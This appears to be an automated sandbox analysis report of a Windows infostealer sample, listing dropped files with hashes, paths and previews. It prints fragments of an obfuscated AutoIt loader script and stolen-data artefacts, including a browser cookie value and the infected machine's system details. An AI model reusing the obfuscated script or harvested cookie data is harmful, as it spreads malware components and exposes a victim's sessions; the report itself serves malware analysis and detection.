SSDEEP:	384:hb8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1FaoO:hpOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
MD5:	75DB92B2110099C43E2CD950B8C07044
SHA1:	4210A6F51F04B5C03F842976A92FE4DCF084966D
SHA-256:	5FA222741FB9591E13E5042524793D2BEC9D2482D5A95A6D6126FC96D0EABB96
SHA-512:	6AFF1DA18FDB3730197FB0A75AFE05BDDF92D4E5C72F1F8826E9DABF6A253A1DB3FEE0860D0BC3E87EEE1E4CF6CC60A0870C96D22DFA652595CF5523C709A76E
Malicious:	false
Preview:	..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.u.A.V.h.o.Z.X.w.k.G.\.M.a.l.e...e.x.e...c.o.m.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .\|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.0.4.-.0.6. .1.3.:.5.8.:.5.3.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .h.a.r.d.z. .(.7.2.4.5.3.6.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_Screen_Desktop.jpeg Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	71446
Entropy (8bit):	7.8168059868865045
Encrypted:	false
SSDEEP:	1536:IL6PIYJfQ2e9HgJSIUu1bzcs4D+5qfXSdQbLfeQ533F:vjNQt9HMUu13csouqqdQD5nF
MD5:	517531E7F886D99F39D527EB75B83A62
SHA1:	060FD147D557D9D3A7D36E8B5A5B23EEB8895270
SHA-256:	796FC0080545EFA51C6BA69A71CD4D2A187AC1CC121653831A2F70024DDF3DF3
SHA-512:	9095A22024B37F29CD10D4493AD9AE505389B08AF45ADB6CA8DFD07867346D79A77911A010594C237213C22D94125723EC659E96751C37373FE9ACB4F660041C
Malicious:	false
Preview:	......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~....:-.\|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.\|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%..../....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J*..wZ...)n#G\. ..q^....G...........\.5..?E{..!...

C:\Users\user\AppData\Local\Temp\sldDCZXdq\cMgIojVP.tmp Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sldDCZXdq\esKSXoNK.tmp Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\cookies.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.764653712247076
Encrypted:	false
SSDEEP:	3:PJu3rraJH4SF0RW8o3HWmWqxWVCg7nL4mRAYX5WRyLHIrWl0y85AMpOHTA2t2rsx:Pk3r2gHo3HWvmWogYmmYIkV0NAXhtfx
MD5:	9AB2402D70D9EF25386BA0DD87A360C6
SHA1:	815D1C83962C514CCC08A466BBC4DF2CC1F43FF9
SHA-256:	43140B30EF43810669BCC17B4514822C70C484BFBDC9CF953A9987C868E15A05
SHA-512:	1DC7FBBEBD673CE7566109B2CE0E89062864E624ACC0E4E57B759F9483251E52FB44578AD8C8A443F04BD2450F6573A369CFA126E0F3284269A5BF44F87D41C4
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.1630345132.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..

C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\cookies\google_chrome_new.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.764653712247076
Encrypted:	false
SSDEEP:	3:PJu3rraJH4SF0RW8o3HWmWqxWVCg7nL4mRAYX5WRyLHIrWl0y85AMpOHTA2t2rsx:Pk3r2gHo3HWvmWogYmmYIkV0NAXhtfx
MD5:	9AB2402D70D9EF25386BA0DD87A360C6
SHA1:	815D1C83962C514CCC08A466BBC4DF2CC1F43FF9
SHA-256:	43140B30EF43810669BCC17B4514822C70C484BFBDC9CF953A9987C868E15A05
SHA-512:	1DC7FBBEBD673CE7566109B2CE0E89062864E624ACC0E4E57B759F9483251E52FB44578AD8C8A443F04BD2450F6573A369CFA126E0F3284269A5BF44F87D41C4
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.1630345132.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..

C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\screenshot.jpg Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	71446
Entropy (8bit):	7.8168059868865045
Encrypted:	false
SSDEEP:	1536:IL6PIYJfQ2e9HgJSIUu1bzcs4D+5qfXSdQbLfeQ533F:vjNQt9HMUu13csouqqdQD5nF
MD5:	517531E7F886D99F39D527EB75B83A62
SHA1:	060FD147D557D9D3A7D36E8B5A5B23EEB8895270
SHA-256:	796FC0080545EFA51C6BA69A71CD4D2A187AC1CC121653831A2F70024DDF3DF3
SHA-512:	9095A22024B37F29CD10D4493AD9AE505389B08AF45ADB6CA8DFD07867346D79A77911A010594C237213C22D94125723EC659E96751C37373FE9ACB4F660041C
Malicious:	false
Preview:	......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~....:-.\|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.\|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%..../....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J*..wZ...)n#G\. ..q^....G...........\.5..?E{..!...

C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\system_info.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	20462
Entropy (8bit):	3.5257039698697756
Encrypted:	false
SSDEEP:	384:SLcsOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1FaoO:SxOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
MD5:	229259D61D06FA3C2AEEFF87C961CAED
SHA1:	36D1F10EC70AA3AE18995C8E12944A8EDCD945AA
SHA-256:	6ACDA06AEEB5CE39B9B4C9A43BD5AE1CFF27CBDE1E96F9B326310C1E5EB4A19D
SHA-512:	1942A4CBC21DCDFB08704DD96E34F9390E85AA6A42BBBC71D9D9913C4F864F475F67DD56A6A4FCE48BDFEF5AF498B097684C845C1E5470C688533328F0B526B7
Malicious:	false
Preview:	..E.X.E._.P.A.T.H.:. . . . . . . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.u.A.V.h.o.Z.X.w.k.G.\.M.a.l.e...e.x.e...c.o.m.....O.p.e.r.a.t.i.n.g. .s.y.s.t.e.m.:. . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t.(.x.6.4.). . . .b.u.i.l.d.:. .1.7.1.3.4. . . .r.e.l.e.a.s.e.:. .1.8.0.3.....O.p.e.r.a.t.i.n.g. .s.y.s.t.e.m. .l.a.n.g.u.a.g.e.:. .e.n.-.U.S.....K.e.y.b.o.a.r.d. .l.a.n.g.u.a.g.e.s.:. . . . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). ./. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . . . .2.0.2.1.-.0.4.-.0.6. .1.3.:.5.8.:.5.4.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.n.a.m.e. .(.C.o.m.p.u.t.e.r.n.a.m.e.).:. . . .h.a.r.d.z. .(.7.2.4.5.3.6.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.c.o.r.e.s.:. .4.).....M.e.m.o.r.y. .r.a.m.:. . . . . . . . . . . . . . . . .8.1.9.1. . .m.b...

C:\Users\user\AppData\Local\Temp\sldDCZXdq\jeju.tmp Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sldDCZXdq\kKBw.tmp Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sldDCZXdq\kSnjehAJ.tmp Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uAVhoZXwkG\Emergevano.m4a Download File
Process:	C:\Users\user\Desktop\32_64_ver_2_bit.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	115849
Entropy (8bit):	5.771618584766646
Encrypted:	false
SSDEEP:	3072:cgqeCAOqHTJkFa22R2mp/AsOLuFx8UHJoH6:cgqfqzCYImbAuv8soa
MD5:	3E75F498B9E93D88BFA792FAC35DFA82
SHA1:	59545966ED48A9CE3DDE4AC76ACF46ED6A14664B
SHA-256:	8E83388424EA598D6BEFCACBAD9F9EA2498BC69A0E5B3FFC9286FF06850ADADB
SHA-512:	85EA86C6D05F91887E3C8D56415F83F5C97ADF42C14959315D0789CFE6358A1429558807EB89D49DDF8E67E4E75CBEB38F01D851599D95725F54E31AD0EFE3AE
Malicious:	false
Preview:	YCIFsgOZetEilPjBtvvxcgbhwibpLQcLgeJKnXyPxZySZqBfYeHDBISJy=DpREhkITTouCrudHqcpEhwGolJpSpFlZFezVYPMTlyiaovYAjTIvAAiCDIzEeQJhYiXqMxJlJfxoUhZOKIGfWNntURafciQxvTxwmYNRlbNlyZHfIFTxpzskISyVezOBm..LwSYfMVOynZhYVleGQgvleCpaGSSPQJjLyhGbKfimxgSkcTlKZ=YhrPJnJFITeZgPNCTHDFVAuXQOKXXMIiQrLZIfEiOyGgvcZenSqCuzRbuyZVOLIWkUpktOUErvRQTSAcOHmtLywvkhSCfJaebKeBkNXKYvmKBqDgFEuukDlyTMZRVsgzrOzpPZpwKPyfFdUlKDXKDjQTAWHmNuOGiyGMHzmFct..vbUADRPuaxEQRXmJSsJhEqmimJoDdtsgnQxvFvtIYZvjDfPOiKGgMQRcYNqTJk=hrfswDrrvjqfEEhElUzcGbeCHYYbSvkZMloogXOktGlwLBhRLoQYdQpPqMKrFFkZwwCxvtfjuidZhqRuKiMJGjJVqaoBhLGnxlqJYTxGTDSomlCZVDabSCzOaHxtWOZcBSEeqiiRMyQezAvPPoGJaoFSQkssndKyDbGHGmZOcALMMscR..EgNofezjLjOQQavcLnVUOpdpRhSbSumQmuUwWWgchcUhlXFigswSmXvx=EdwpWzFMXsKnxnOlmHzfeYUIKoBtHsBJmraGjjdegAhGVJTThHZdryVFvznNSAyGPqYsyiXhdsqCLhNwfIRZslGxoMlTNCpNcGQULCNyKLqMtaUoGvnpJyfFxDozWtmNijutvSdMULfFlTfPSwhdtqtfskAixxpFkjFRjPMNuLfXQJxAgaBVRoJioQNlspaACJz..gbDefmlaKumHRqTwTgOrDnJceBcWzOcufbkQOnFsYsvesyzsddHgVdxQOoqNrhYWKzazOejxIvtjwH=WotGeiikZexwGn

C:\Users\user\AppData\Roaming\uAVhoZXwkG\Essa.m4a Download File
Process:	C:\Users\user\Desktop\32_64_ver_2_bit.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	658069
Entropy (8bit):	5.855189388677772
Encrypted:	false
SSDEEP:	12288:Lfq7VlhQXk7TQ1x1ql+9vyDwPmXCpgX/Hrha:fTgvVa
MD5:	E21F873ED107A12173FA57B3C2E78724
SHA1:	C91F109E41B1AF0CA3829CBF6646B58CBFD833FA
SHA-256:	A56660170B2BD820041ED5FC6EB6EF177A5E855AA4E59AF03FFC8D0EBA536572
SHA-512:	97C83573A163A04C994DB09D421FC2712E34327318B5E4A92F7A2F74C2B8A457B5E2F74167C34A15256ECC6FFACB14308E05C6CB8F2F45F2C631D29176DFE535
Malicious:	false
Preview:	$SawsRokPMW = GNECKBFHY("104<89<90<84<124<88<113<126<116<85<115<90<119",5)..#NoTrayIcon....Func ugDbwUpjTQXwCFTZCq($LEaTi,$NvOS,$hlFNLt,$LeQFVZF)..Local $OCWXZXfOcvkXuMbqcKQWSoUWfUUYvTCrRlI = 'VnghfYfIzNVtoUEUsgKGHZHyesaBTouVrkyXcDHTSkDBYPQBfHLCAeEVQokYGOPlHqqWPGnOHQNvvyujAQjkbDcwHpujaJhtvaUYOTLIoWVKgomKeYbPCDNtEZfGAkvYDJZtkobGyDeAHKNmKc'...$wNARLYqXlbSKX = 186..$jNJzIjeUN = 76..While ((5566-5565)*5293)..Switch $wNARLYqXlbSKX..Case 180....$TcekaBLBMPcwWNav = Execute(GNECKBFHY("80<95<118<108<48<80<105<124<105<110<96<83<80<49",8))..$187 = 163..For $saxkZoOLFtpwZFujuQCEHuKeiGSRwXZpAzqLQmUjhmNvCANlgPPWQS = 10 To 32..Local $ccHWfdozhmHTICk = 'eaIxPrbcBXdPysCqoGSzoZBCRQxSbmHxnmeHSkOaXjcsZag'..Local $TcekaBLBMPcwWNav = GNECKBFHY("72<76<120<75<83<114<102<83<122<68<91<75<70<90<102<101<87<116<72<103<86<112<89<83<66<119<88<70<113",1)..Next....$wNARLYqXlbSKX = $wNARLYqXlbSKX + 1..Case 181....$CbVQOFKGmZQMIPJ = GNECKBFHY("73<123<97<109<118<119<105<123<126<114<117<124<79",8)..$59 = 104..For $gawrwIH

C:\Users\user\AppData\Roaming\uAVhoZXwkG\Giudichera.m4a Download File
Process:	C:\Users\user\Desktop\32_64_ver_2_bit.exe
File Type:	data
Category:	dropped
Size (bytes):	943872
Entropy (8bit):	6.625635993428688
Encrypted:	false
SSDEEP:	24576:hJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:hC7hGOSPT/PxebaiO
MD5:	104B949829C662083A6551F4D23E51E0
SHA1:	1F8478F2D0FBBA8F9DBEBFA547FB17E017248252
SHA-256:	66D41524374D5DB4C8D677CEA74F5EECA09FF691D03FFB44F68CEB46DA5778A1
SHA-512:	3A1B203BE484AF81ED78A519D2265B6E617D2C7B4B2103AAA7553A90B9E94E06D7FA72A4DE8F40864646412F864354E9B3C378478FFD2182786A88944B568EA1
Malicious:	false
Preview:	rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com Download File
Process:	C:\Windows\SysWOW64\findstr.exe
File Type:	Targa image data - Mono 65536 x 184 x 0 +65535 ""
Category:	modified
Size (bytes):	943782
Entropy (8bit):	6.625457835020965
Encrypted:	false
SSDEEP:	24576:IJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:IC7hGOSPT/PxebaiO
MD5:	DAB8F26DB6E8D76655D96B463513CE6A
SHA1:	EA9C3631F94233C06750776CD9BD18E27FBD8677
SHA-256:	549D70CF61A50E8970E274BF7E76F4C9FAB1E185189A8AD074E2A5BDEA39005B
SHA-512:	E406093EB802A5EDBDC0E5F0A849D7F58F10DDED413DB9B6E0A4788125BA73C5B90F5D42A5D98AC68BA2E1FC01879C1403F32CFB3D8E5C26231C58E9751C2093
Malicious:	true
Preview:	......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B..................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uAVhoZXwkG\Suo.m4a Download File
Process:	C:\Users\user\Desktop\32_64_ver_2_bit.exe
File Type:	data
Category:	dropped
Size (bytes):	908800
Entropy (8bit):	7.999816744490406
Encrypted:	true
SSDEEP:	24576:0KGjcwD295YxfZRqSmdRfCdMEPtSt1qOq3mXo5:0vgwCefh1tSjqV3mQ
MD5:	13B959BAF14B9696D005FF489503BAAC
SHA1:	8C8B980F4D68C6FE77572D14F3068276A1E84C7C
SHA-256:	2ED2CB4341D8E82413EA79FA3660DE1A24D48FF1741C917F775DCC2C1D970CBA
SHA-512:	8A312D67B925AC5A07691C098E9DF331E1E3440973659527E44810B0463656E13C57C699E72C864696B6BE6BF68A9D5EF6E1F8AE222171D6A06B61A2BAF73505
Malicious:	false
Preview:	.....[..:.@..[..'...tyx....5....4.ikp...Oi._......[Z12sEx.g..1-...L.....l..P...F..O..O.&...G........Q..k..4...!V.....y.+...F..._..z.P..j?.8....~uV+.@.\|W..+2r...C...d..x.....x...Z....X~...{%}..`It..~...ug.{......r.........p.H.{<Z...<..... ..,.G.G##V......A~Y.s.....s.C.M.=.Lye@..n..-....x..,\.0.%.!...m(.?<....n.9-..K.0\|' .D$........Vk-.q.SD5..j...la.....jm....2.q....&...].. ....3..Q.....N..SQ.Q.....JmU....`...\|8,d .. k...e...q..F...%rx..ND.!94....yW{g<.......w`a..r.GN.K.......\t#8.2N....N..-..:'`<0\|+."...I..p..}o.'...OK...D:.6$.d..m..x........I..d.+J'qt.6....:kO....e......<.r)....#D.5...].s.V.d...C...a..RBe.<...).w.\|.j.....T.^Y.P."........G..~.).x.r.....S~$...B.X.8sL..7N.....i..}.T....5..39.Fy.x8...l..gO._...".....d....{Q.[..(.1.....L.@.Fn.o.......Y1.9....4-...V.0..._.../u.. ...$_...i.z.H..S%s...2.....P..k{'.Y.].lz...l.......:.K7..<.......?.<...r...v...5.0.Z.@a..r>........z..%....sH3..O./5.:.Ct..AEm..&...}]..vl.a.j..C....%^......z..`e.i.Se.

C:\Users\user\AppData\Roaming\uAVhoZXwkG\p Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	658069
Entropy (8bit):	5.855189388677772
Encrypted:	false
SSDEEP:	12288:Lfq7VlhQXk7TQ1x1ql+9vyDwPmXCpgX/Hrha:fTgvVa
MD5:	E21F873ED107A12173FA57B3C2E78724
SHA1:	C91F109E41B1AF0CA3829CBF6646B58CBFD833FA
SHA-256:	A56660170B2BD820041ED5FC6EB6EF177A5E855AA4E59AF03FFC8D0EBA536572
SHA-512:	97C83573A163A04C994DB09D421FC2712E34327318B5E4A92F7A2F74C2B8A457B5E2F74167C34A15256ECC6FFACB14308E05C6CB8F2F45F2C631D29176DFE535
Malicious:	false
Preview:	$SawsRokPMW = GNECKBFHY("104<89<90<84<124<88<113<126<116<85<115<90<119",5)..#NoTrayIcon....Func ugDbwUpjTQXwCFTZCq($LEaTi,$NvOS,$hlFNLt,$LeQFVZF)..Local $OCWXZXfOcvkXuMbqcKQWSoUWfUUYvTCrRlI = 'VnghfYfIzNVtoUEUsgKGHZHyesaBTouVrkyXcDHTSkDBYPQBfHLCAeEVQokYGOPlHqqWPGnOHQNvvyujAQjkbDcwHpujaJhtvaUYOTLIoWVKgomKeYbPCDNtEZfGAkvYDJZtkobGyDeAHKNmKc'...$wNARLYqXlbSKX = 186..$jNJzIjeUN = 76..While ((5566-5565)*5293)..Switch $wNARLYqXlbSKX..Case 180....$TcekaBLBMPcwWNav = Execute(GNECKBFHY("80<95<118<108<48<80<105<124<105<110<96<83<80<49",8))..$187 = 163..For $saxkZoOLFtpwZFujuQCEHuKeiGSRwXZpAzqLQmUjhmNvCANlgPPWQS = 10 To 32..Local $ccHWfdozhmHTICk = 'eaIxPrbcBXdPysCqoGSzoZBCRQxSbmHxnmeHSkOaXjcsZag'..Local $TcekaBLBMPcwWNav = GNECKBFHY("72<76<120<75<83<114<102<83<122<68<91<75<70<90<102<101<87<116<72<103<86<112<89<83<66<119<88<70<113",1)..Next....$wNARLYqXlbSKX = $wNARLYqXlbSKX + 1..Case 181....$CbVQOFKGmZQMIPJ = GNECKBFHY("73<123<97<109<118<119<105<123<126<114<117<124<79",8)..$59 = 104..For $gawrwIH

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Entropy (8bit):	7.962739419522704
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	32_64_ver_2_bit.exe
File size:	1807502
MD5:	010d7703a5d4cfea5ea6e9ced6b42eff
SHA1:	e84cc31bfece34b438fea81b149f834db1632df9
SHA256:	0868a2a7b5e276d3a4a40cdef994de934d33d62a689d7207a31fd57d012ef948
